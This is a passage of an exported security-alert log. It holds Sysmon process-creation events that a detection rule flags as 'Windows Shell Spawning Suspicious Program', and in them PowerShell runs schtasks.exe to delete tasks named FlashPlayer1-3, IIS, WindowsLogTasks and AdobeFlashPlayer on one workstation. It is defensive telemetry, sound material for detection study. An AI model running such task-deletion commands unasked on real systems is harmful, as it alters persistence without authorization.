Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.499",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.698 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-0010b4ea2e00} +ProcessId: 2096 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsLogTasks /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: 
{df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.701812000Z"",""eventRecordID"":""3557"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.698\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-0010b4ea2e00}\r\nProcessId: 2096\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo 
-NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.698"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-0010b4ea2e00}"",""processId"":""2096"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsLogTasks /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.483",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.663 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001012e92e00} +ProcessId: 7336 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN IIS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} 
+LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.666063800Z"",""eventRecordID"":""3556"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.663\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001012e92e00}\r\nProcessId: 7336\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: 
{df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.663"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-001012e92e00}"",""processId"":""7336"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN IIS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.470",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.633 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001084e72e00} +ProcessId: 7480 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft 
Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.638812400Z"",""eventRecordID"":""3555"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.633\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001084e72e00}\r\nProcessId: 7480\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 
0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.633"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-001084e72e00}"",""processId"":""7480"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.453",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.593 +ProcessGuid: 
{df9fc3d3-b3f7-5ecf-0000-0010a6e52e00} +ProcessId: 612 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.596028900Z"",""eventRecordID"":""3554"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.593\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-0010a6e52e00}\r\nProcessId: 612\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.593"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-0010a6e52e00}"",""processId"":""612"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.437",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.528 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00107ee32e00} +ProcessId: 2940 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.537568000Z"",""eventRecordID"":""3553"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.528\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00107ee32e00}\r\nProcessId: 2940\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.528"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-00107ee32e00}"",""processId"":""2940"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.423",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.435 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00107ce12e00} +ProcessId: 1684 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN AdobeFlashPlayer /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.437268600Z"",""eventRecordID"":""3552"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.435\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00107ce12e00}\r\nProcessId: 1684\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:07.435"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-00107ce12e00}"",""processId"":""1684"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN AdobeFlashPlayer /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 